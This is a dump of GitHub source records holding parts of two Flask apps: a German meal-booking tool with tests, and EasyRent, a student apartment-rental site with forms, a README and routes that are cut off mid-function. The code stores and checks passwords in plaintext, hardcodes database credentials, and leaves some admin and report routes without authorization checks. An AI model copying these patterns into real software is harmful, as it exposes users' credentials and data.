a_bookings = database.get_bookings(g.db, event_id)\n if len(a_bookings) == 0:\n a_bookings = None\n return render_template_string(u'{% extends \"layout.html\" %} {% block admin %}<br><a href=\"{{ url_for(\"admin\", page=1) }}\">Admin</a>{% endblock %}{% block body %} <p>Angemeldete User: <br> {% if bookings != None %} {{ bookings|join(\", \") }}{% else %} Niemand hat sicher bisher angemeldet.{% endif %} <br><br> <a href=\"{{ url_for(\"list_events\", page=1) }}\">Zurück zur Übersicht</a></p>{% endblock %}', bookings=a_bookings)\n\[email protected](\"/admin/bookings/<event_id>\")\ndef admin_list_bookings(event_id):\n a_bookings = database.get_bookings(g.db, event_id)\n if len(a_bookings) == 0:\n a_bookings = None\n return render_template_string(u'{% extends \"layout.html\" %} {% block body %} <p>Angemeldete User: <br> {% if bookings != None %} {{ bookings|join(\", \") }}{% else %} Niemand hat sicher bisher angemeldet.{% endif %} <br><br> <a href=\"{{ url_for(\"admin\", page=1) }}\">Zurück zur Übersicht</a></p>{% endblock %}', bookings=a_bookings)\n\[email protected](\"/events\", methods=[\"POST\"])\ndef create_event():\n event = get_Event_from_Request(request)\n errors = validate(event)\n if (len(errors) == 0):\n database.create_event(g.db, event)\n flash(u\"Termin erstellt.\", \"success\")\n return redirect(url_for(\"admin\", page=1))\n else:\n for field, msg in errors.items():\n flash(msg, \"error\")\n if event[\"slots\"] == -1:\n event[\"slots\"] = \"unendlich\"\n return render_template_string('{% extends \"layout.html\" %} {% block body %} {% include \"create_event.html\" %} {% endblock %}', new_event=event)\n\[email protected](\"/reports/\")\ndef report_bookings_var():\n return render_template_string('{% extends \"layout.html\" %} {% block body %} {% include \"report_booking.html\" %} {% endblock %}')\n\[email protected](\"/reports/send\", methods=[\"POST\"])\ndef report_bookings_send():\n return redirect(url_for(\"report_bookings\", start=request.form[\"start\"], end=request.form[\"end\"]))\n\[email protected](\"/reports/<start>/<end>\")\ndef report_bookings(start, end):\n \"\"\"\n displays a simple report of events plus bookings in the given time frame\n\n both start and end date are ISO-8601 date strings\n \"\"\"\n\n events_by_user = defaultdict(lambda: [])\n for event in database.list_events(g.db, start, end):\n for username in event[\"bookings\"]: # TODO: limit by AuthZ / user\n date = format_date(event[\"date\"], True)\n events_by_user[username].append(date)\n\n rows = [\"Mitarbeiter;Anzahl;Details\"]\n rows += [\";\".join([username, unicode(len(dates)), \", \".join(dates)])\n for username, dates in events_by_user.items()]\n\n response = make_response(\"\\n\".join(rows))\n response.headers[\"Content-Type\"] = \"text/plain\"\n response.headers[\"Content-Disposition\"] = \"attachment;filename=%s_%s.csv\" % (\n start, end)\n return response\n\[email protected](\"/reports/json/\")\ndef new_bookings_json_next_week():\n return json.dumps(database.list_events(g.db, (get_next_Monday() - timedelta(days=1)).isoformat(), (get_next_Monday() + timedelta(days=7)).isoformat()))\n\[email protected](\"/reports/json/<end>/\")\ndef new_bookings_json_specific_end(end):\n return json.dumps(database.list_events(g.db, datetime.now().isoformat(), end))\n\[email protected](\"/reports/json/<start>/<end>/\")\ndef new_bookings_json_specific_timedelta(start, end):\n return json.dumps(database.list_events(g.db, start, end))\n\n\ndef validate(event, new=True):\n errors = {}\n\n try:\n int(event[\"slots\"])\n except ValueError:\n event[\"slots\"] = -1 # XXX: hacky?\n\n date = event[\"date\"]\n try:\n assert len(date) == 10, u\"Ungültiges Datum.\"\n if new:\n date_current = datetime.strptime(date, \"%Y-%m-%d\")\n date_now = datetime.now()\n assert date_now < date_current, u\"Datum liegt in der Vergangenheit.\"\n\n except AssertionError, e:\n errors[\"date\"] = e.message\n\n if (event[\"title\"] is None or event[\"title\"].strip() == \"\"):\n errors[\"title\"] = u\"Speisentitel fehlt.\"\n\n if new:\n prevdates = []\n for e in database.list_events(g.db):\n prevdates.append(e[\"date\"])\n\n try:\n if date in prevdates:\n errors[\"date\"] = u\"Speise an diesem Datum schon vorhanden.\"\n except:\n pass\n\n return errors\n\n\[email protected](\"/events/<event_id>/my_booking\", methods=[\"POST\"])\ndef handle_booking(event_id):\n date_now = datetime.now()\n date = format_date(g.db.get(\"events:%s:date\" % event_id))\n last_Friday = get_Friday(date)\n date = datetime.strptime(date, \"%Y-%m-%d\")\n late = False\n warn = False\n\n if date <= date_now:\n late = True\n if date_now > last_Friday:\n warn = True\n\n if not late and not warn:\n if request.form.get(\"_method\", \"PUT\").upper() == \"DELETE\":\n return cancel_event(event_id)\n else:\n return book_event(event_id)\n elif late:\n flash(u\"Buchungen sind nicht mehr änderbar. Bitte Anja oder einen Admin fragen, wenn trotzdem etwas geändert werden soll.\", \"error\")\n return redirect(url_for(\"list_events\", page=1))\n elif warn:\n flash(u\"Achtung: Diese Buchungsänderung ist nicht vor Freitag vorgenommen worden. Bitte diese zeitig an Anja melden.\", \"error\")\n if request.form.get(\"_method\", \"PUT\").upper() == \"DELETE\":\n return cancel_event(event_id)\n else:\n return book_event(event_id)\n\n\[email protected](\"/admin/<event_id>/delete\", methods=[\"POST\"])\ndef delete_event(event_id):\n if database.delete_event(g.db, event_id):\n flash(u\"Löschen erfolgreich.\", \"success\")\n else:\n flash(u\"Löschen nicht erfolgreich.\", \"error\")\n return redirect(url_for(\"admin\", page=1))\n\n\[email protected](\"/admin/events/<event_id>/edit\", methods=[\"POST\"])\ndef edit_event(event_id):\n event = database.get_event(g.db, event_id)\n event[\"date\"] = format_date(event[\"date\"])\n if event[\"slots\"] == \"-1\":\n event[\"slots\"] = \"unendlich\"\n return render_template_string('{% extends \"layout.html\" %} {% block alerts %}{% endblock %} {% block body %} {% include \"edit_event.html\" %} {% endblock %}', new_event=event, e_id=event_id)\n\[email protected](\"/admin/events/<event_id>/save\", methods=[\"POST\"])\ndef save_edit_event(event_id):\n event = get_Event_from_Request(request)\n errors = validate(event, new=False)\n if (len(errors) == 0):\n database.edit_event(g.db, event_id, event)\n flash(u\"Termin erfolgreich geändert.\", \"success\")\n return redirect(url_for(\"admin\", page=1))\n else:\n for field, msg in errors.items():\n flash(msg, \"error\")\n if event[\"slots\"] == -1:\n event[\"slots\"] = \"unendlich\"\n return render_template_string('{% extends \"layout.html\" %} {% block alerts %}{% endblock %} {% block body %} {% include \"edit_event.html\" %} {% endblock %}', new_event=event, e_id =event_id)\n\n\[email protected](\"/events/<event_id>/my_booking\", methods=[\"PUT\"])\ndef book_event(event_id):\n veg = request.form.get(\"vegetarian\")\n if database.book_event(g.db, event_id, g.current_user, vegetarian=veg):\n flash(u\"Anmeldung erfolgreich.\", \"success\")\n else:\n flash(u\"Anmeldung nicht erfolgreich.\", \"error\")\n return redirect(url_for(\"list_events\", page=1))\n\n\[email protected](\"/events/<event_id>/my_booking\", methods=[\"DELETE\"])\ndef cancel_event(event_id):\n if database.cancel_event(g.db, event_id, g.current_user):\n flash(u\"Abmeldung erfolgreich.\", \"success\")\n else:\n flash(u\"Abmeldung nicht erfolgreich.\", \"error\")\n return redirect(url_for(\"list_events\", page=1))\n\n\[email protected](\"/admin/events/<event_id>/edit_booking\", methods=[\"POST\"])\ndef cancel_event_admin(event_id):\n a_bookings = database.get_bookings(g.db, event_id)\n return render_template_string('{% extends \"layout.html\" %} {% block alerts %}{% endblock %} {% block body %} {% include \"edit_bookings.html\" %} {% endblock %}', bookings=a_bookings, e_id=event_id)\n\n\[email protected](\"/admin/events/<event_id>/edit_booking/save\", methods=[\"POST\"])\ndef cancel_event_admin_save(event_id):\n user = request.form[\"user\"]\n bookings = database.get_bookings(g.db, event_id)\n if request.form.get(\"_method\"):\n if user not in bookings:\n flash(u\"User nicht in Buchungen vorhanden\", \"error\")\n return render_template_string('{% extends \"layout.html\" %} {% block alerts %}{% endblock %} {% block body %} {% include \"edit_bookings.html\" %} {% endblock %}', bookings=bookings, e_id =event_id)\n elif database.cancel_event(g.db, event_id, user):\n flash(u\"Abmeldung erfolgreich.\", \"success\")\n else:\n flash(\"Abmeldung nicht erfolgreich.\", \"error\")\n elif database.book_event(g.db, event_id, user, vegetarian=False):\n flash(u\"Anmeldung erfolgreich.\", \"success\")\n else:\n flash(u\"Anmeldung nicht erfolgreich.\", \"error\")\n return redirect(url_for(\"admin\", page=1))\n\ndef get_Friday(value):\n \"\"\"\n returns the date of the friday of the previous week as an datetime object\n \"\"\"\n date = datetime.strptime(value,\"%Y-%m-%d\")\n timedel = timedelta(days=datetime.strptime(value, \"%Y-%m-%d\").weekday() + 2)\n date = date - timedel\n return date\n\ndef get_next_Monday():\n \"\"\"\n returns the date of the next Monday as an datetime object\n \"\"\"\n date_now = datetime.now();\n return date_now + timedelta(days=(7 - date_now.weekday()))\n\ndef get_Event_from_Request(request):\n event = {\n \"date\": format_date(request.form[\"date\"]),\n \"title\": request.form[\"title\"],\n \"details\": request.form[\"details\"],\n \"slots\": request.form[\"slots\"],\n \"vegetarian\": request.form.get(\"vegetarian\")\n }\n return event\n\ndef get_events_paginated(page, db):\n countpages = int(ceil(database.get_count_events(db) / MAXEVENTS))\n pages = []\n for i in range(1,countpages+1):\n pages.append(i)\n start = MAXEVENTS*(int(page)-1)\n events = database.list_events(db)\n sortedEvents = sorted(events, key=lambda k: k['date'], reverse=True)\n sortedEvents = sortedEvents[start:start+MAXEVENTS]\n return pages,sortedEvents\n\ndef format_date(value, include_weekday=False): # XXX: does not belong here\n \"\"\"\n if it's not already a date string, it converts an ISO-8601-like integer into a date string:\n 20120315 -> \"2012-03-15 (Donnerstag)\"\n \"\"\"\n\n date = value\n try:\n assert len(date) == 10\n assert date[4] == date[7] == \"-\"\n except AssertionError:\n try:\n assert len(date) == 8\n date = str(value)\n date = \"%s-%s-%s\" % (date[0:4], date[4:6], date[6:8])\n except (AssertionError, ValueError):\n return \"\"\n\n if include_weekday:\n weekday = datetime.strptime(date, \"%Y-%m-%d\").weekday()\n weekday = (u\"Montag\", u\"Dienstag\", u\"Mittwoch\", u\"Donnerstag\", u\"Freitag\",\n u\"Samstag\", u\"Sonntag\")[weekday]\n date += \" (%s)\" % weekday\n\n return date\n\n\ndef month_name(date, include_year=False):\n \"\"\"\n returns the (German) name of the month based on a ISO-8601 date string\n \"2012-03-15\" -> \"März 2012\"\n \"\"\"\n # XXX: partially duplicates `normalize_date`\n try:\n assert len(date) == 10\n assert date[4] == date[7] == \"-\"\n except (AssertionError, ValueError):\n raise ValueError(\"invalid date format\")\n\n month = datetime.strptime(date, \"%Y-%m-%d\").month - 1\n res = [u\"Januar\", u\"Februar\", u\"März\", u\"April\", u\"Mai\", u\"Juni\", u\"Juli\",\n u\"August\", u\"September\", u\"Oktober\", u\"November\", u\"Dezember\"][month]\n\n if include_year:\n res += str(datetime.strptime(date, \"%Y-%m-%d\").year)\n\n return res\n\n\ndef normalize_date(value): # XXX: does not belong here\n \"\"\"\n converts an ISO-8601 date string into an integer:\n \"2012-03-15\" -> 20120315\n\n raises ValueError if date format is not ISO-8601\n \"\"\"\n try:\n assert len(value) == 10\n assert value[4] == value[7] == \"-\"\n date = int(value.replace(\"-\", \"\"))\n except (AssertionError, ValueError):\n raise ValueError(\"invalid date format\")\n return date\n\napp.jinja_env.filters[\"format_date\"] = format_date # XXX: does not belong here!\n"
},
{
"alpha_fraction": 0.5213435888290405,
"alphanum_fraction": 0.5342897176742554,
"avg_line_length": 32.23255920410156,
"blob_id": "8a332b10048b1001a9bf4b27d92117ea7e26ba2e",
"content_id": "0410bfe82c1f4e49a371d6ab7f88fb4d3adff442",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2860,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 86,
"path": "/test/test_events.py",
"repo_name": "hhagmans/mittach",
"src_encoding": "UTF-8",
"text": "# encoding: utf-8\nimport os, sys, unittest\n\nos.environ[\"MITTACH_CONFIG_MODE\"] = \"testing\"\nsys.path.append(\"/Users/hendrik11/Documents/innoq_mittach\")\nfrom mittach.web import app, database\nfrom flask import Flask, g\n\nclass TestCase(unittest.TestCase):\n\n def setUp(self):\n assert app.config[\"MODE\"] == \"testing\"\n # reset database\n self.db = database.connect(app.config)\n self.db.flushall()\n self.app = app.test_client()\n\n\n# def tearDown(self):\n# os.close(self.db)\n# os.unlink(mittach.DATABASE)\n\n def test_creation(self):\n data = { \"title\": \"FooBar\", \"details\": \"\", \"date\": \"2012:03:10\",\n \"slots\": 3, \"vegetarian\": True }\n\n assert database.create_event(self.db, data) == 1\n\n def test_event_list(self):\n defaults = { \"details\": \"\", \"date\": 0, \"vegetarian\": False }\n for i, data in enumerate([{ \"title\": \"Foo\", \"slots\": 1 },\n { \"title\": \"Bar\", \"slots\": 2, \"vegetarian\": True },\n { \"title\": \"Baz\", \"slots\": 3 }]):\n _data = {}\n _data.update(defaults)\n _data.update(data)\n database.create_event(self.db, _data)\n\n events = database.list_events(self.db)\n assert len(events) == 3\n assert [\"Baz\", \"Bar\", \"Foo\"] == [event[\"title\"] for event in events]\n\n def test_admin(self):\n\n with app.test_request_context():\n rv = self.app.get('/events/1')\n print rv.data\n assert u'Admin' in rv.data\n\nif __name__ == '__main__':\n unittest.main()\n\n#class Test(object):\n#\n# def setup_method(self, method):\n# assert app.config[\"MODE\"] == \"testing\"\n# # reset database\n# self.db = database.connect(app.config)\n# self.db.flushall()\n#\n# def test_creation(self):\n# data = { \"title\": \"FooBar\", \"details\": \"\", \"date\": \"2012:03:10\",\n# \"slots\": 3, \"vegetarian\": True }\n# try:\n# assert database.create_event(self.db, data) == 1\n# print \"Test 1 success\"\n# except AssertionError:\n# print \"Test 1 failed\"\n#\n# def test_event_list(self):\n# defaults = { \"details\": \"\", \"date\": 0, \"vegetarian\": False }\n# for i, data in enumerate([{ \"title\": \"Foo\", \"slots\": 1 },\n# { \"title\": \"Bar\", \"slots\": 2, \"vegetarian\": True },\n# { \"title\": \"Baz\", \"slots\": 3 }]):\n# _data = {}\n# _data.update(defaults)\n# _data.update(data)\n# database.create_event(self.db, _data)\n#\n# events = database.list_events(self.db)\n# assert len(events) == 3\n# assert [\"Baz\", \"Bar\", \"Foo\"] == [event[\"title\"] for event in events]\n#\n# def test_admin(self):\n# rv = self.app.get('/admin/1')\n# assert u'Du besitzt nicht die benötigten Rechte für diese Seite.' in rv.data\n"
}
] | 2 |
Jason003/EasyRent | https://github.com/Jason003/EasyRent | 4a15af4cd23a602ad90224a40702cc3935e4a4fa | f05c64b94e63b72e9ac4d7169003347cc1e8bb1d | 5d5c33edeabf0ef7da62ab4308b0f3fc5a69ae0b | refs/heads/master | 2020-09-07T13:53:12.363354 | 2019-11-10T21:18:07 | 2019-11-10T21:18:07 | 220,801,933 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.72743159532547,
"alphanum_fraction": 0.72743159532547,
"avg_line_length": 36.30434799194336,
"blob_id": "e41e2e1014d67277d793e0baf1798c8c2f442a12",
"content_id": "e89aa5b19915324f69e5b88d384d1d2a2d32297b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1717,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 46,
"path": "/app/forms.py",
"repo_name": "Jason003/EasyRent",
"src_encoding": "UTF-8",
"text": "from flask_wtf import FlaskForm\nfrom wtforms import StringField, PasswordField, SubmitField, TextAreaField, DateField, SelectField\nfrom wtforms.validators import DataRequired\nfrom flask_admin.form.widgets import DatePickerWidget\n\n\nclass LoginForm(FlaskForm):\n username = StringField('Username', validators=[DataRequired()])\n password = PasswordField('Password', validators=[DataRequired()])\n submit = SubmitField('Sign In')\n\n\nclass RegisterForm(FlaskForm):\n username = StringField('Username', validators=[DataRequired()])\n email = StringField('Email', validators=[DataRequired()])\n password = PasswordField('Password', validators=[DataRequired()])\n submit = SubmitField('Register')\n\n\nclass InquireForm(FlaskForm):\n message = TextAreaField('Message', validators=[DataRequired()])\n submit = SubmitField('Send')\n\n\nclass LeaseForm(FlaskForm):\n start_date = DateField('Start Date', validators=[DataRequired()], format='%Y/%m/%d', widget=DatePickerWidget())\n end_date = DateField('End Date', validators=[DataRequired()], format='%Y/%m/%d', widget=DatePickerWidget())\n submit = SubmitField('Sign')\n\n\nclass CommentForm(FlaskForm):\n comment = TextAreaField('Comment', validators=[DataRequired()])\n submit = SubmitField('Comment')\n\n\nclass StudentVerifyForm(FlaskForm):\n university = StringField('University', validators=[DataRequired()])\n student_id = StringField('Student ID', validators=[DataRequired()])\n submit = SubmitField('Verify')\n\nclass FilterForm(FlaskForm):\n key_word = StringField('Key Word & Location')\n price = StringField('Less than')\n bedrooms = StringField('Bedrooms')\n bathrooms = StringField('Bathrooms')\n submit = SubmitField('Search')\n\n"
},
{
"alpha_fraction": 0.7530080080032349,
"alphanum_fraction": 0.778743326663971,
"avg_line_length": 72.85185241699219,
"blob_id": "4965c51576af12d45c766f5b8e57da3894472b2d",
"content_id": "ba02fb8de09f5c95a6d65896cfd9a9adc4ee9c4f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5984,
"license_type": "no_license",
"max_line_length": 654,
"num_lines": 81,
"path": "/README.md",
"repo_name": "Jason003/EasyRent",
"src_encoding": "UTF-8",
"text": "# Easy Renter\n\nEasyRenter is a house renting platform which provides services including inquiry sending, lease signing, multi-conditional search and comments.\n\n## Basic Infomation\n### Group Member\n```\nJiefan Li <jl5501>\nYuyao Zhong <yz3618>\n```\n### PostgreSql account\n```\nJL5501\n```\n### URL of Web Application\n\n[http://34.74.195.72:8111/](http://34.74.195.72:8111/) \n\n## Description\n\nThe website includes all the functions mentioned in the part 1, with 7 entities and database set up in the part 2.\n\n### Users\nUsers can create an account by clicking the \"Register\" button on the top right at the home page. A user needs to fill in the infomation of Username, Email and Password. After registering, users can log in by clicking the \"Login\" button on the top right of the page, where username and password are required. If password does match, the users can not login. After log in, a user can check his or her basic infomation on the personal web page, which can be entered by clicking the username displayed on the top right at the home page.\n\n### Apartments\nThe infomation of the apartments is listed on the home page, with clear titles show the addresses of the apartments. By clicking each titles, the detailed infomation of the apartments will be displayed, including price, the number of bedrroms and bathrooms, description, and the responsible brokers. The comments on the apartment are also shown on the page.\n\n### Comments\nUsers can post comments in the web page of an apartment by click the \"Post Comment\" button next to the title of \"Comments\". Before posting a comment, users must log in first. If a user does not log in but press the \"Post Comment\", the webpage will be redirected to the Log-In page.\n\n### Brokers\n\nOn an apartment list, the name of the broker who is responsible for the apartment will be displayed.\n\n### Inquiries\nOn each apartment list, users can send inquiries to the responsible broker by clicking the \"Inquire\" button next to the name of the broker. On the Inquiry page, users need to fill in the message, and click \"Send\" button to send the message. After sending the inquiry, users can get their history records of sent inquiries in their personal webpages.\n\n### Lease Signing\nUsers can choose to sign a lease on an apartment by clicking the \"Sign Lease\" button on the page of the apartement. Users need to choose the start date and end date for their leases. After signing a lease, the history records of signed leases can also be quiried on the personal webpages.\n\n### Student\nA user can verify to be a student on his or her personal web page by clicking \"Student Verification\" next to the user name. After entering the university and student ID, the account will be come a student account. After verification, the user will be redirected to the personal webpage with notice of \"Successfully Verified\", and the user will also be marked as \"Student\" next to the user name.\n\n## Interesting Operations\n### Multi-conditional Search\nAt the home page, users can query by key words and location, the boundary of the price, and the numbers of bedrooms and bathrooms, which can help users decrease the range to search ideal apartments. Users do not need to fill all the blanks but instead only choose the conditions they want to add. The conditions that are not empty will be stored to the corresponding variables, then combining together to form a SQL query which includes all the conditions through string concatenation. The result of the query will be sent back and displayed on the webpage, with a list of apartments that satisfy the conditions, or empty if no apartments meet the needs.\n\nFor example, by inputing following infomation:\n```\nKey Word & Location: 362\nLess than: $10000\n```\nwhere leaves the conditions of bedrooms and bathrooms empty, the page will then display a list with an apartment that meets the condition:\n```\n362 W 119th St APT 2, New York, NY 10026\n```\nUsers can then click the title to know more details about the apartments.\nIt is an interesting part because it is useful in practice, which enables users to narrow down their search. It also makes SQL queries flexible, since we do not need to fill all the blank to send a query.\n\n### The apartment webpages\nThe apartment webpages are used to display the detailed information, descriptions, the related brokers and the comments. To get the comprehensive components, we need to make queries among not only the apartment table, but also the broker and user tables, with apartment id as the input. \n\nThe users can input data to the database through inquiries and comments. When users make inquiries, we also need to insert the records of inquiries to the inquiry table in the database. To post comments, firstly it will be checked whether a user has logged in, or he or she will be directed to the log-in page. Then a user will be directed to the comment page which allows them to enter comments after clicking the button. After posting, users will be redirected to the previous apartment webpage and see their comments.\nFor example, for the apartment of \"963 Amsterdam Ave APT 6, New York, NY 10025\" and a virtual user with name as \"test11\", before posting comments, the comment part will shows:\n```\n2r1rcgd (2019-05-07 02:01:00) : The location is amazing!\n\n8g46he (2019-03-21 15:48:00) : Very good location!\n```\nAfter the user post a comment with content *\"Comment just for showing an example\"*, the comment part of the apartment will become:\n```\ntest11 (2019-11-07 20:43:48) : Comment just for showing an example\n\n2r1rcgd (2019-05-07 02:01:00) : The location is amazing!\n\n8g46he (2019-03-21 15:48:00) : Very good location!\n```\nwhich displays the latest comment on the first row.\n\nIt is also an interesting part, because it includes comprehensive SQL queries that are related to several entities including apartments, users, brokers and comments. Users can also make insertion to the databases by sending inquiries and comments and to see their comments as soon as they make a post.\n\n\n"
},
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.8285714387893677,
"avg_line_length": 17,
"blob_id": "e0e3ae81c16484dcd767fa145b7e6658f268f9bb",
"content_id": "211f51c6c81c8e9212490ccf32b87fe89aebcc5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 35,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 2,
"path": "/.flaskenv",
"repo_name": "Jason003/EasyRent",
"src_encoding": "UTF-8",
"text": "FLASK_APP=easyrent.py\nFLASK_DEBUG=1"
},
{
"alpha_fraction": 0.606812059879303,
"alphanum_fraction": 0.609417200088501,
"avg_line_length": 39.015445709228516,
"blob_id": "33466210eaf16373ae30f70e5317401544165f8a",
"content_id": "e6f880bfc5d8d46f7614b24e257933955ba5b5df",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10364,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 259,
"path": "/app/routes.py",
"repo_name": "Jason003/EasyRent",
"src_encoding": "UTF-8",
"text": "from app import app\nfrom flask import render_template, flash, redirect, url_for, g, session\nfrom sqlalchemy import *\nfrom app.forms import *\nimport uuid\nimport datetime\n\nDATABASEURI = \"postgresql://jl5501:[email protected]/proj1part2\"\nengine = create_engine(DATABASEURI)\n\n\[email protected]_request\ndef before_request():\n \"\"\"\n This function is run at the beginning of every web request\n (every time you enter an address in the web browser).\n We use it to setup a database connection that can be used throughout the request.\n\n The variable g is globally accessible.\n \"\"\"\n try:\n g.conn = engine.connect()\n print('Connected to database')\n except:\n print(\"uh oh, problem connecting to database\")\n import traceback;\n traceback.print_exc()\n g.conn = None\n\n\[email protected]_request\ndef teardown_request(exception):\n \"\"\"\n At the end of the web request, this makes sure to close the database connection.\n If you don't, the database could run out of memory!\n \"\"\"\n try:\n g.conn.close()\n except Exception as e:\n pass\n\n\[email protected]('/')\[email protected]('/index', methods=['GET', 'POST'])\ndef index():\n form = FilterForm()\n SQL = 'SELECT * FROM apartments where 1 = 1 '\n d = {}\n if form.submit():\n key_word = form.key_word.data\n if key_word:\n SQL += ' and (description like :key_word or address like :key_word) '\n d['key_word'] = '%' + key_word + '%'\n lessThan = form.price.data\n if lessThan:\n try:\n lessThan = int(lessThan)\n SQL += ' and price <= :lessThan'\n d['lessThan'] = lessThan\n except:\n flash('Less than should be a number')\n bedrooms = form.bedrooms.data\n if bedrooms:\n try:\n bedrooms = int(bedrooms)\n SQL += ' and bedrooms = :bedrooms'\n d['bedrooms'] = bedrooms\n except:\n flash('Bedrooms should be a number')\n bathrooms = form.bathrooms.data\n if bathrooms:\n try:\n bathrooms = int(bathrooms)\n SQL += ' and bathrooms = :bathrooms'\n d['bathrooms'] = bathrooms\n except:\n flash('Bathrooms should be a number')\n cursor = g.conn.execute(text(SQL), d)\n apartments = cursor.fetchall()\n cursor.close()\n return render_template('index.html', apartments=apartments, form=form)\n\n\[email protected]('/login', methods=['GET', 'POST'])\ndef login():\n form = LoginForm()\n if form.validate_on_submit():\n cursor = g.conn.execute(text('select * from users where username = :username and password = :password'),\n {'username': form.username.data, 'password': form.password.data})\n user = cursor.fetchall()\n if len(user) == 0:\n flash('Incorrect Username or Password!')\n return render_template('login.html', title='Sign In', form=form)\n flash('Welcome back, {}!'.format(\n form.username.data))\n user = user[0]\n session['user_id'] = user[0]\n session['user_name'] = user[1]\n session['user_email'] = user[2]\n cursor = g.conn.execute(text('select * from students where user_id = :user_id'), {'user_id': user[0]})\n student = cursor.fetchall()\n if student and len(student):\n session['is_student'] = True\n else:\n session['is_student'] = False\n return redirect(url_for('index'))\n return render_template('login.html', title='Sign In', form=form)\n\n\[email protected]('/register', methods=['GET', 'POST'])\ndef register():\n form = RegisterForm()\n if form.validate_on_submit():\n g.conn.execute(text('''\nINSERT INTO users VALUES (:id, :username, :email, :password)\n'''), {'id': str(uuid.uuid1()), 'username': form.username.data, 'email': form.email.data,\n 'password': form.password.data})\n return redirect(url_for('login'))\n return render_template('register.html', title='Register', form=form)\n\n\[email protected]('/logout')\ndef logout():\n session.pop('user_id', None)\n session.pop('user_name', None)\n session.pop('user_email', None)\n session.pop('is_student', None)\n return redirect(url_for('index'))\n\n\[email protected]('/apartment/<apartment_id>')\ndef apartment(apartment_id):\n cursor = g.conn.execute(text(\n \"SELECT * FROM apartments, brokers where apartment_id = :apartment_id and apartments.broker_id = brokers.broker_id\"),\n {'apartment_id': apartment_id})\n apartment = cursor.fetchone()\n cursor = g.conn.execute(text(\n \"SELECT * FROM comments c, users u where c.apartment_id = :apartment_id and c.user_id = u.user_id order by c.time desc\"),\n {'apartment_id': apartment_id})\n comments = cursor.fetchall()\n cursor.close()\n return render_template('apartment.html', apt=apartment, comments=comments)\n\n\[email protected]('/inquire/<apartment_id>', methods=['GET', 'POST'])\ndef inquire(apartment_id):\n if 'user_id' not in session:\n return redirect(url_for('login'))\n form = InquireForm()\n cursor = g.conn.execute(text(\n \"SELECT * FROM apartments, brokers where apartment_id = :apartment_id and apartments.broker_id = brokers.broker_id\"),\n {'apartment_id': apartment_id})\n apartment = cursor.fetchone()\n if form.validate_on_submit():\n message = form.message.data\n cursor = g.conn.execute(\n text('insert into inquiries values (:inquiry_id, :user_id, :broker_id, :apartment_id, :content, :time)'),\n {'inquiry_id': str(uuid.uuid1()), 'user_id': session['user_id'], 'broker_id': apartment.broker_id,\n 'apartment_id': apartment.apartment_id, 'content': message,\n 'time': datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M\")})\n flash('Message Sent!')\n cursor.close()\n return redirect(url_for('index'))\n cursor.close()\n print(apartment)\n return render_template('inquire.html', apt=apartment, form=form)\n\n\[email protected]('/lease/<apartment_id>', methods=['GET', 'POST'])\ndef lease(apartment_id):\n if 'user_id' not in session:\n return redirect(url_for('login'))\n form = LeaseForm()\n cursor = g.conn.execute(text(\n \"SELECT * FROM apartments, brokers where apartment_id = :apartment_id and apartments.broker_id = brokers.broker_id\"),\n {'apartment_id': apartment_id})\n apartment = cursor.fetchone()\n if form.validate_on_submit():\n cursor = g.conn.execute(\n text('insert into signedleases values (:lease_id, :user_id, :apartment_id, :start_date, :end_date)'),\n {'lease_id': str(uuid.uuid1()), 'user_id': session['user_id'],\n 'apartment_id': apartment.apartment_id, 'start_date': form.start_date.data.strftime(\"%Y-%m-%d %H:%M\"),\n 'end_date': form.end_date.data.strftime(\"%Y-%m-%d %H:%M\")})\n flash('Lease Signed!')\n cursor.close()\n return redirect(url_for('index'))\n cursor.close()\n print(apartment)\n return render_template('lease.html', apt=apartment, form=form)\n\n\[email protected]('/comment/<apartment_id>', methods=['GET', 'POST'])\ndef comment(apartment_id):\n if 'user_id' not in session:\n return redirect(url_for('login'))\n form = CommentForm()\n cursor = g.conn.execute(text(\n \"SELECT * FROM apartments, brokers where apartment_id = :apartment_id and apartments.broker_id = brokers.broker_id\"),\n {'apartment_id': apartment_id})\n apartment = cursor.fetchone()\n if form.validate_on_submit():\n comment = form.comment.data\n cursor = g.conn.execute(\n text('insert into comments values (:comment_id, :user_id, :apartment_id, :content, :time)'),\n {'comment_id': str(uuid.uuid1()), 'user_id': session['user_id'],\n 'apartment_id': apartment.apartment_id, 'content': comment,\n 'time': datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")})\n flash('Comment Posted!')\n cursor.close()\n return redirect(url_for('apartment', apartment_id=apartment_id))\n cursor.close()\n return render_template('comment.html', apt=apartment, form=form)\n\n\[email protected]('/dashboard/<user_id>', methods=['GET', 'POST'])\ndef dashboard(user_id):\n if 'user_id' not in session:\n return redirect(url_for('login'))\n cursor = g.conn.execute(text(\n \"SELECT * FROM inquiries i, apartments a where i.apartment_id = a.apartment_id and i.user_id = :user_id\"),\n {'user_id': session['user_id']})\n inquiries = cursor.fetchall()\n cursor = g.conn.execute(text(\n \"SELECT * FROM signedleases s, apartments a where s.apartment_id = a.apartment_id and s.user_id = :user_id\"),\n {'user_id': session['user_id']})\n leases = cursor.fetchall()\n cursor.close()\n return render_template('dashboard.html', inquiries=inquiries, leases=leases)\n\n\[email protected]('/student_verify/<user_id>', methods=['GET', 'POST'])\ndef student_verify(user_id):\n if 'user_id' not in session:\n return redirect(url_for('login'))\n if session['is_student']:\n flash('You have been verified!')\n return redirect(url_for('dashboard', user_id=user_id))\n form = StudentVerifyForm()\n cursor = g.conn.execute(text(\n \"SELECT * FROM users where user_id = :user_id\"), {'user_id': user_id})\n user = cursor.fetchone()\n if form.validate_on_submit():\n cursor = g.conn.execute(\n text('select * from students where university = :university and student_id = :student_id'),\n {'university': form.university.data, 'student_id': form.student_id.data})\n currentStudent = cursor.fetchall()\n if currentStudent and 